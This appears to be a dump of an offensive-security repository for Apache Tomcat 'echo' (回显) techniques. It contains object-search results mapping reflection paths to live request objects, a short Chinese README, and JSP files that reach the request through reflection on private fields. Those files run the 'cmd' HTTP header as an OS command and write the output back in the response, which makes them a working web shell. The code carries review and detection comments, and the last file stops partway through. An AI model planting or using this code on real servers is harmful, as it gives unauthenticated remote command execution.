53 | ---> [1] = {org.apache.catalina.connector.Request}
54 |
55 |
56 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
57 | ---> group = {java.lang.ThreadGroup}
58 | ---> threads = {class [Ljava.lang.Thread;}
59 | ---> [15] = {java.lang.Thread}
60 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
61 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
62 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
63 | ---> connections = {java.util.Map}
64 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
65 | ---> request = {org.apache.coyote.Request}
66 | ---> notes = {class [Ljava.lang.Object;}
67 | ---> [1] = {org.apache.catalina.connector.Request}
68 | ---> applicationRequest = {org.apache.catalina.connector.RequestFacade}
69 |
70 |
71 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
72 | ---> group = {java.lang.ThreadGroup}
73 | ---> threads = {class [Ljava.lang.Thread;}
74 | ---> [15] = {java.lang.Thread}
75 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
76 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
77 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
78 | ---> connections = {java.util.Map}
79 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
80 | ---> request = {org.apache.coyote.Request}
81 | ---> notes = {class [Ljava.lang.Object;}
82 | ---> [1] = {org.apache.catalina.connector.Request}
83 | ---> specialAttributes = {java.util.Map}
84 | ---> [org.apache.catalina.parameter_parse_failed_reason] = {org.apache.catalina.connector.Request$6}
85 |
86 |
87 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
88 | ---> group = {java.lang.ThreadGroup}
89 | ---> threads = {class [Ljava.lang.Thread;}
90 | ---> [15] = {java.lang.Thread}
91 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
92 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
93 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
94 | ---> connections = {java.util.Map}
95 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
96 | ---> request = {org.apache.coyote.Request}
97 | ---> notes = {class [Ljava.lang.Object;}
98 | ---> [1] = {org.apache.catalina.connector.Request}
99 | ---> specialAttributes = {java.util.Map}
100 | ---> [org.apache.catalina.core.DISPATCHER_TYPE] = {org.apache.catalina.connector.Request$1}
101 |
102 |
103 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
104 | ---> group = {java.lang.ThreadGroup}
105 | ---> threads = {class [Ljava.lang.Thread;}
106 | ---> [15] = {java.lang.Thread}
107 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
108 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
109 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
110 | ---> connections = {java.util.Map}
111 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
112 | ---> request = {org.apache.coyote.Request}
113 | ---> notes = {class [Ljava.lang.Object;}
114 | ---> [1] = {org.apache.catalina.connector.Request}
115 | ---> specialAttributes = {java.util.Map}
116 | ---> [org.apache.catalina.ASYNC_SUPPORTED] = {org.apache.catalina.connector.Request$3}
117 |
118 |
119 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
120 | ---> group = {java.lang.ThreadGroup}
121 | ---> threads = {class [Ljava.lang.Thread;}
122 | ---> [15] = {java.lang.Thread}
123 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
124 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
125 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
126 | ---> connections = {java.util.Map}
127 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
128 | ---> request = {org.apache.coyote.Request}
129 | ---> notes = {class [Ljava.lang.Object;}
130 | ---> [1] = {org.apache.catalina.connector.Request}
131 | ---> specialAttributes = {java.util.Map}
132 | ---> [org.apache.tomcat.sendfile.support] = {org.apache.catalina.connector.Request$7}
133 |
134 |
135 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
136 | ---> group = {java.lang.ThreadGroup}
137 | ---> threads = {class [Ljava.lang.Thread;}
138 | ---> [15] = {java.lang.Thread}
139 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
140 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
141 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
142 | ---> connections = {java.util.Map}
143 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
144 | ---> request = {org.apache.coyote.Request}
145 | ---> notes = {class [Ljava.lang.Object;}
146 | ---> [1] = {org.apache.catalina.connector.Request}
147 | ---> specialAttributes = {java.util.Map}
148 | ---> [org.apache.catalina.parameter_parse_failed] = {org.apache.catalina.connector.Request$5}
149 |
150 |
151 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
152 | ---> group = {java.lang.ThreadGroup}
153 | ---> threads = {class [Ljava.lang.Thread;}
154 | ---> [15] = {java.lang.Thread}
155 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
156 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
157 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
158 | ---> connections = {java.util.Map}
159 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
160 | ---> request = {org.apache.coyote.Request}
161 | ---> notes = {class [Ljava.lang.Object;}
162 | ---> [1] = {org.apache.catalina.connector.Request}
163 | ---> specialAttributes = {java.util.Map}
164 | ---> [org.apache.catalina.core.DISPATCHER_REQUEST_PATH] = {org.apache.catalina.connector.Request$2}
165 |
166 |
167 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
168 | ---> group = {java.lang.ThreadGroup}
169 | ---> threads = {class [Ljava.lang.Thread;}
170 | ---> [15] = {java.lang.Thread}
171 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
172 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
173 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
174 | ---> connections = {java.util.Map}
175 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
176 | ---> request = {org.apache.coyote.Request}
177 | ---> notes = {class [Ljava.lang.Object;}
178 | ---> [1] = {org.apache.catalina.connector.Request}
179 | ---> specialAttributes = {java.util.Map}
180 | ---> [org.apache.catalina.realm.GSS_CREDENTIAL] = {org.apache.catalina.connector.Request$4}
181 |
182 |
183 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
184 | ---> contextClassLoader = {org.apache.catalina.loader.ParallelWebappClassLoader}
185 | ---> resources = {org.apache.catalina.webresources.StandardRoot}
186 | ---> mserver = {com.sun.jmx.mbeanserver.JmxMBeanServer}
187 | ---> mbsInterceptor = {com.sun.jmx.interceptor.DefaultMBeanServerInterceptor}
188 | ---> repository = {com.sun.jmx.mbeanserver.Repository}
189 | ---> domainTb = {java.util.Map>}
190 | ---> [Catalina] = {java.util.HashMap}
191 | ---> [Catalina] = {com.sun.jmx.mbeanserver.NamedObject}
192 | ---> object = {org.apache.tomcat.util.modeler.BaseModelMBean}
193 | ---> resource = {org.apache.catalina.valves.AccessLogValve}
194 | ---> logElements = {class [Lorg.apache.catalina.valves.AbstractAccessLogValve$AccessLogElement;}
195 | ---> [9] = {org.apache.catalina.valves.AbstractAccessLogValve$RequestElement}
196 |
197 |
198 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
199 | ---> contextClassLoader = {org.apache.catalina.loader.ParallelWebappClassLoader}
200 | ---> resources = {org.apache.catalina.webresources.StandardRoot}
201 | ---> mserver = {com.sun.jmx.mbeanserver.JmxMBeanServer}
202 | ---> mbsInterceptor = {com.sun.jmx.interceptor.DefaultMBeanServerInterceptor}
203 | ---> repository = {com.sun.jmx.mbeanserver.Repository}
204 | ---> domainTb = {java.util.Map>}
205 | ---> [Catalina] = {java.util.HashMap}
206 | ---> entrySet = {java.util.HashMap$EntrySet}
207 | ---> this$0 = {class java.util.HashMap}
208 | ---> [name=HttpRequest2,type=RequestProcessor,worker="http-nio-8080"] = {com.sun.jmx.mbeanserver.NamedObject}
209 | ---> object = {org.apache.tomcat.util.modeler.BaseModelMBean}
210 | ---> resource = {org.apache.coyote.RequestInfo}
211 |
212 |
213 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
214 | ---> contextClassLoader = {org.apache.catalina.loader.ParallelWebappClassLoader}
215 | ---> resources = {org.apache.catalina.webresources.StandardRoot}
216 | ---> mserver = {com.sun.jmx.mbeanserver.JmxMBeanServer}
217 | ---> mbsInterceptor = {com.sun.jmx.interceptor.DefaultMBeanServerInterceptor}
218 | ---> repository = {com.sun.jmx.mbeanserver.Repository}
219 | ---> domainTb = {java.util.Map>}
220 | ---> [Catalina] = {java.util.HashMap}
221 | ---> entrySet = {java.util.HashMap$EntrySet}
222 | ---> this$0 = {class java.util.HashMap}
223 | ---> [name=HttpRequest2,type=RequestProcessor,worker="http-nio-8080"] = {com.sun.jmx.mbeanserver.NamedObject}
224 | ---> object = {org.apache.tomcat.util.modeler.BaseModelMBean}
225 | ---> resource = {org.apache.coyote.RequestInfo}
226 | ---> req = {org.apache.coyote.Request}
227 |
228 |
229 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
230 | ---> contextClassLoader = {org.apache.catalina.loader.ParallelWebappClassLoader}
231 | ---> resources = {org.apache.catalina.webresources.StandardRoot}
232 | ---> mserver = {com.sun.jmx.mbeanserver.JmxMBeanServer}
233 | ---> mbsInterceptor = {com.sun.jmx.interceptor.DefaultMBeanServerInterceptor}
234 | ---> repository = {com.sun.jmx.mbeanserver.Repository}
235 | ---> domainTb = {java.util.Map>}
236 | ---> [Catalina] = {java.util.HashMap}
237 | ---> entrySet = {java.util.HashMap$EntrySet}
238 | ---> this$0 = {class java.util.HashMap}
239 | ---> [name=HttpRequest2,type=RequestProcessor,worker="http-nio-8080"] = {com.sun.jmx.mbeanserver.NamedObject}
240 | ---> object = {org.apache.tomcat.util.modeler.BaseModelMBean}
241 | ---> resource = {org.apache.coyote.RequestInfo}
242 | ---> req = {org.apache.coyote.Request}
243 | ---> notes = {class [Ljava.lang.Object;}
244 | ---> [1] = {org.apache.catalina.connector.Request}
245 |
246 |
247 |
--------------------------------------------------------------------------------
/Tomcat/Java Object Searcher search result/tomcat 9.0.33 result.txt:
--------------------------------------------------------------------------------
1 | #############################################################
2 | Java Object Searcher v0.01
3 | author: c0ny1
4 | github: http://github.com/c0ny1/java-object-searcher
5 | #############################################################
6 |
7 |
8 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
9 | ---> group = {java.lang.ThreadGroup}
10 | ---> threads = {class [Ljava.lang.Thread;}
11 | ---> [16] = {java.lang.Thread}
12 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
13 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
14 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
15 | ---> global = {org.apache.coyote.RequestGroupInfo}
16 |
17 |
18 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
19 | ---> group = {java.lang.ThreadGroup}
20 | ---> threads = {class [Ljava.lang.Thread;}
21 | ---> [16] = {java.lang.Thread}
22 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
23 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
24 | ---> connections = {java.util.Map>}
25 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
26 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
27 | ---> request = {org.apache.coyote.Request}
28 |
29 |
30 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
31 | ---> group = {java.lang.ThreadGroup}
32 | ---> threads = {class [Ljava.lang.Thread;}
33 | ---> [16] = {java.lang.Thread}
34 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
35 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
36 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
37 | ---> global = {org.apache.coyote.RequestGroupInfo}
38 | ---> processors = {java.util.List}
39 | ---> [0] = {org.apache.coyote.RequestInfo}
40 |
41 |
42 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
43 | ---> group = {java.lang.ThreadGroup}
44 | ---> threads = {class [Ljava.lang.Thread;}
45 | ---> [16] = {java.lang.Thread}
46 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
47 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
48 | ---> connections = {java.util.Map>}
49 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
50 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
51 | ---> request = {org.apache.coyote.Request}
52 | ---> notes = {class [Ljava.lang.Object;}
53 | ---> [1] = {org.apache.catalina.connector.Request}
54 |
55 |
56 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
57 | ---> group = {java.lang.ThreadGroup}
58 | ---> threads = {class [Ljava.lang.Thread;}
59 | ---> [16] = {java.lang.Thread}
60 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
61 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
62 | ---> connections = {java.util.Map>}
63 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
64 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
65 | ---> request = {org.apache.coyote.Request}
66 | ---> notes = {class [Ljava.lang.Object;}
67 | ---> [1] = {org.apache.catalina.connector.Request}
68 | ---> applicationRequest = {org.apache.catalina.connector.RequestFacade}
69 |
70 |
71 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
72 | ---> group = {java.lang.ThreadGroup}
73 | ---> threads = {class [Ljava.lang.Thread;}
74 | ---> [16] = {java.lang.Thread}
75 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
76 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
77 | ---> connections = {java.util.Map>}
78 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
79 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
80 | ---> request = {org.apache.coyote.Request}
81 | ---> notes = {class [Ljava.lang.Object;}
82 | ---> [1] = {org.apache.catalina.connector.Request}
83 | ---> specialAttributes = {java.util.Map}
84 | ---> [org.apache.catalina.parameter_parse_failed_reason] = {org.apache.catalina.connector.Request$6}
85 |
86 |
87 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
88 | ---> group = {java.lang.ThreadGroup}
89 | ---> threads = {class [Ljava.lang.Thread;}
90 | ---> [16] = {java.lang.Thread}
91 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
92 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
93 | ---> connections = {java.util.Map>}
94 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
95 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
96 | ---> request = {org.apache.coyote.Request}
97 | ---> notes = {class [Ljava.lang.Object;}
98 | ---> [1] = {org.apache.catalina.connector.Request}
99 | ---> specialAttributes = {java.util.Map}
100 | ---> [org.apache.catalina.core.DISPATCHER_TYPE] = {org.apache.catalina.connector.Request$1}
101 |
102 |
103 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
104 | ---> group = {java.lang.ThreadGroup}
105 | ---> threads = {class [Ljava.lang.Thread;}
106 | ---> [16] = {java.lang.Thread}
107 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
108 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
109 | ---> connections = {java.util.Map>}
110 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
111 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
112 | ---> request = {org.apache.coyote.Request}
113 | ---> notes = {class [Ljava.lang.Object;}
114 | ---> [1] = {org.apache.catalina.connector.Request}
115 | ---> specialAttributes = {java.util.Map}
116 | ---> [org.apache.catalina.ASYNC_SUPPORTED] = {org.apache.catalina.connector.Request$3}
117 |
118 |
119 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
120 | ---> group = {java.lang.ThreadGroup}
121 | ---> threads = {class [Ljava.lang.Thread;}
122 | ---> [16] = {java.lang.Thread}
123 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
124 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
125 | ---> connections = {java.util.Map>}
126 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
127 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
128 | ---> request = {org.apache.coyote.Request}
129 | ---> notes = {class [Ljava.lang.Object;}
130 | ---> [1] = {org.apache.catalina.connector.Request}
131 | ---> specialAttributes = {java.util.Map}
132 | ---> [org.apache.tomcat.sendfile.support] = {org.apache.catalina.connector.Request$7}
133 |
134 |
135 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
136 | ---> group = {java.lang.ThreadGroup}
137 | ---> threads = {class [Ljava.lang.Thread;}
138 | ---> [16] = {java.lang.Thread}
139 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
140 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
141 | ---> connections = {java.util.Map>}
142 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
143 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
144 | ---> request = {org.apache.coyote.Request}
145 | ---> notes = {class [Ljava.lang.Object;}
146 | ---> [1] = {org.apache.catalina.connector.Request}
147 | ---> specialAttributes = {java.util.Map}
148 | ---> [org.apache.catalina.parameter_parse_failed] = {org.apache.catalina.connector.Request$5}
149 |
150 |
151 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
152 | ---> group = {java.lang.ThreadGroup}
153 | ---> threads = {class [Ljava.lang.Thread;}
154 | ---> [16] = {java.lang.Thread}
155 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
156 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
157 | ---> connections = {java.util.Map>}
158 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
159 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
160 | ---> request = {org.apache.coyote.Request}
161 | ---> notes = {class [Ljava.lang.Object;}
162 | ---> [1] = {org.apache.catalina.connector.Request}
163 | ---> specialAttributes = {java.util.Map}
164 | ---> [org.apache.catalina.core.DISPATCHER_REQUEST_PATH] = {org.apache.catalina.connector.Request$2}
165 |
166 |
167 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
168 | ---> group = {java.lang.ThreadGroup}
169 | ---> threads = {class [Ljava.lang.Thread;}
170 | ---> [16] = {java.lang.Thread}
171 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
172 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
173 | ---> connections = {java.util.Map>}
174 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
175 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
176 | ---> request = {org.apache.coyote.Request}
177 | ---> notes = {class [Ljava.lang.Object;}
178 | ---> [1] = {org.apache.catalina.connector.Request}
179 | ---> specialAttributes = {java.util.Map}
180 | ---> [org.apache.catalina.realm.GSS_CREDENTIAL] = {org.apache.catalina.connector.Request$4}
181 |
182 |
183 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
184 | ---> contextClassLoader = {org.apache.catalina.loader.ParallelWebappClassLoader}
185 | ---> resources = {org.apache.catalina.webresources.StandardRoot}
186 | ---> mserver = {com.sun.jmx.mbeanserver.JmxMBeanServer}
187 | ---> mbsInterceptor = {com.sun.jmx.interceptor.DefaultMBeanServerInterceptor}
188 | ---> repository = {com.sun.jmx.mbeanserver.Repository}
189 | ---> domainTb = {java.util.Map>}
190 | ---> [Catalina] = {java.util.HashMap}
191 | ---> [Catalina] = {com.sun.jmx.mbeanserver.NamedObject}
192 | ---> object = {org.apache.tomcat.util.modeler.BaseModelMBean}
193 | ---> resource = {org.apache.catalina.valves.AccessLogValve}
194 | ---> logElements = {class [Lorg.apache.catalina.valves.AbstractAccessLogValve$AccessLogElement;}
195 | ---> [9] = {org.apache.catalina.valves.AbstractAccessLogValve$RequestElement}
196 |
197 |
198 |
--------------------------------------------------------------------------------
/Tomcat/README.md:
--------------------------------------------------------------------------------
1 | # Tomcat 回显
2 |
3 | # 2020.9.19 update
4 | 参考 xray 中的 tomcat 回显代码对代码逻辑进行优化,并参照其做法将 Tomcat6/7/8/8.5/9 回显代码合并为一个文件
5 |
6 | ## 使用 ```c0ny1``` 编写的 ```Java Object Searcher``` 挖掘结果
7 | * Tomcat 6
8 | 
9 |
10 | * Tomcat 7
11 | 
12 |
13 | * Tomcat 8
14 | 
15 |
16 | * Tomcat 8.5
17 | 
18 |
19 | * Tomcat 9
20 | 
21 |
22 | ## 效果
23 | 
24 |
25 | ## 参考
26 | * [https://github.com/c0ny1/java-object-searcher/](https://github.com/c0ny1/java-object-searcher/)
27 | * [半自动化挖掘request实现多种中间件回显](http://gv7.me/articles/2020/semi-automatic-mining-request-implements-multiple-middleware-echo/)
28 |
--------------------------------------------------------------------------------
/Tomcat/code/Tomcat6Echo-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
    // Review summary: this scriptlet runs the value of the "cmd" request header as an
    // operating-system command and writes the command output into the HTTP response.
    // No authentication, authorization or validation of the header value appears here.
    // The request objects are reached by reading private fields through reflection,
    // starting at the current thread: target -> this$0 -> handler -> global ->
    // processors, then the "req" field of every element of that list.
    // Detection notes: setAccessible(true) on these field names from JSP code, a
    // request header literally named "cmd", and a child process started by the
    // servlet container are the observable traits of this file.
3 | Object obj = Thread.currentThread();
4 | java.lang.reflect.Field field = obj.getClass().getDeclaredField("target");
5 | field.setAccessible(true);
6 | obj = field.get(obj);
7 |
    // "this$0" is the compiler-generated reference from an inner class to its outer instance.
8 | field = obj.getClass().getDeclaredField("this$0");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
12 | field = obj.getClass().getDeclaredField("handler");
13 | field.setAccessible(true);
14 | obj = field.get(obj);
15 |
16 | field = obj.getClass().getDeclaredField("global");
17 | field.setAccessible(true);
18 | obj = field.get(obj);
19 |
20 | field = obj.getClass().getDeclaredField("processors");
21 | field.setAccessible(true);
22 | obj = field.get(obj);
23 |
24 |
25 | java.util.List processors = (java.util.List) obj;
26 | for (Object o : processors) {
27 | field = o.getClass().getDeclaredField("req");
28 | field.setAccessible(true);
29 | obj = field.get(o);
30 | org.apache.coyote.Request req = (org.apache.coyote.Request) obj;
31 |
    // The header value is client-controlled and is passed to exec() unchanged.
32 | String cmd = req.getHeader("cmd");
33 | if (cmd != null) {
    // Reads the whole standard output of the process as one token ("\\A" delimiter).
34 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
    // Output is written through the coyote response object of the matched request.
35 | org.apache.tomcat.util.buf.ByteChunk bc = new org.apache.tomcat.util.buf.ByteChunk();
36 | bc.setBytes(res.getBytes(), 0, res.getBytes().length);
37 | req.getResponse().doWrite(bc);
38 | }
39 | }
40 | %>
--------------------------------------------------------------------------------
/Tomcat/code/Tomcat78Echo-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
    // Review summary: this scriptlet runs the value of the "cmd" request header with
    // Runtime.exec and writes the command output into the HTTP response of the request
    // that carried the header. No authentication, authorization or input validation
    // appears here.
    // Thread discovery: it reads the private "group" field declared on the superclass of
    // the current thread's class, then that group's private "threads" array, and only
    // inspects threads whose names contain "http-apr"+"Poller", "http-bio"+"AsyncTimeout"
    // or "http-nio"+"Poller".
    // Detection notes: reflective access to group/threads/target/this$0/handler/global/
    // processors/req from JSP code, a request header literally named "cmd", and a child
    // process started by the servlet container are the observable traits of this file.
3 | Object obj = Thread.currentThread();
4 | java.lang.reflect.Field field = obj.getClass().getSuperclass().getDeclaredField("group");
5 | field.setAccessible(true);
6 | obj = field.get(obj);
7 |
8 | field = obj.getClass().getDeclaredField("threads");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
12 | Thread[] threads = (Thread[])obj;
13 | label:for(Thread thread : threads){
14 | try{
15 | if((thread.getName().contains("http-apr") && thread.getName().contains("Poller"))
16 | || (thread.getName().contains("http-bio") && thread.getName().contains("AsyncTimeout"))
17 | || (thread.getName().contains("http-nio") && thread.getName().contains("Poller"))) {
18 | field = thread.getClass().getDeclaredField("target");
19 | field.setAccessible(true);
20 | obj = field.get(thread);
21 |
22 | field = obj.getClass().getDeclaredField("this$0");
23 | field.setAccessible(true);
24 | obj = field.get(obj);
25 |
    // "handler" is looked up on the object's own class first and, if it is not
    // declared there, on the class two levels up the hierarchy.
26 | try{
27 | field = obj.getClass().getDeclaredField("handler");
28 | }catch (NoSuchFieldException e){
29 | field = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("handler");
30 | }
31 | field.setAccessible(true);
32 | obj = field.get(obj);
33 |
    // "global" is looked up on the superclass first, then on the class itself.
34 | try{
35 | field = obj.getClass().getSuperclass().getDeclaredField("global");
36 | }catch(NoSuchFieldException e){
37 | field = obj.getClass().getDeclaredField("global");
38 | }
39 | field.setAccessible(true);
40 | obj = field.get(obj);
41 |
42 | field = obj.getClass().getDeclaredField("processors");
43 | field.setAccessible(true);
44 | obj = field.get(obj);
45 |
46 |
47 | java.util.List processors = (java.util.List) obj;
48 | for (Object o : processors) {
49 | field = o.getClass().getDeclaredField("req");
50 | field.setAccessible(true);
51 | obj = field.get(o);
52 | org.apache.coyote.Request req = (org.apache.coyote.Request) obj;
53 |
    // The header value is client-controlled and is passed to exec() unchanged.
54 | String cmd = req.getHeader("cmd");
55 | if (cmd != null) {
56 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
57 |
58 | org.apache.tomcat.util.buf.ByteChunk bc = new org.apache.tomcat.util.buf.ByteChunk();
59 | bc.setBytes(res.getBytes(), 0, res.getBytes().length);
60 | req.getResponse().doWrite(bc);
    // Leaves both loops after the first request that carried the header.
61 | break label;
62 | }
63 | }
64 | }
65 | }catch(Exception e){
    // Any failure for one thread is printed with printStackTrace() and the
    // loop moves on to the next thread.
66 | e.printStackTrace();
67 | }
68 | }
69 | %>
--------------------------------------------------------------------------------
/Tomcat/code/Tomcat9Echo-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
    // Review summary: this scriptlet runs the value of the "cmd" request header with
    // Runtime.exec and writes the command output into the HTTP response of the request
    // that carried the header. No authentication, authorization or input validation
    // appears here.
    // Thread discovery: it reads the private "group" field declared on the superclass of
    // the current thread's class, then that group's private "threads" array, and only
    // inspects threads whose names contain both "http-nio" and "ClientPoller".
    // Detection notes: reflective access to group/threads/target/this$0/handler/global/
    // processors/req from JSP code, a request header literally named "cmd", and a child
    // process started by the servlet container are the observable traits of this file.
3 | Object obj = Thread.currentThread();
4 | java.lang.reflect.Field field = obj.getClass().getSuperclass().getDeclaredField("group");
5 | field.setAccessible(true);
6 | obj = field.get(obj);
7 |
8 | field = obj.getClass().getDeclaredField("threads");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
